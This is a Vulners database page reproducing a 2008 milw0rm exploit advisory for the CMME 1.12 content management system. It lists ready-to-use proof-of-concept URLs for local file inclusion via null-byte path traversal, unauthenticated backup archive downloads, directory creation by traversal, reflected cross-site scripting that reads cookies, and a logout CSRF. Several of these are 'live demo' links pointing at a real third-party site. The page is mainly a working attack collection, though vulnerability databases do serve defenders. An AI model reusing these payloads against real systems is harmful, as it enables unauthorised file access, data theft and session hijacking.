Vulners
Lucene search
CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities
##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################
[+] Local File Inclusion
Note : magic_quotes_gpc must be off.
Example :
http://localhost/index.php?page=weblog&env=[Local File]%00
PoC :
http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00
[+] Download Backup
Example 1:
http://localhost/backup/[Backup Name].zip
PoC 1:
http://localhost/backup/cmme_data.zip
Live Demo 1:
http://cmme.oesterholt.net/backup/cmme_data.zip
Example 2:
http://localhost/backup/[Backup Name].zip
PoC 2:
http://localhost/backup/cmme_cmme.zip
Live Demo 2:
http://cmme.oesterholt.net/backup/cmme_cmme.zip
[+] Make Directory
You can make multiple directories in website root folder.
Example 1:
http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]
PoC 1:
http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!
Or you can make dir in previous directory,etc.
Example 2:
http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]
PoC 2:
http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!
[+] Cross Site Scripting
Example 1:
http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data
PoC 1:
http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data
Live Demo 1:
http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data
Example 2:
http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data
PoC 2:
http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data
Live Demo 2:
http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data
[+] Cross Site Request Forgery
If an logged in user with administrator privileges clicks the following link he will be logged out.
http://localhost/admin.php?action=logout&page=home&env=data
##################################################################################################################
# milw0rm.com [2008-08-26]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1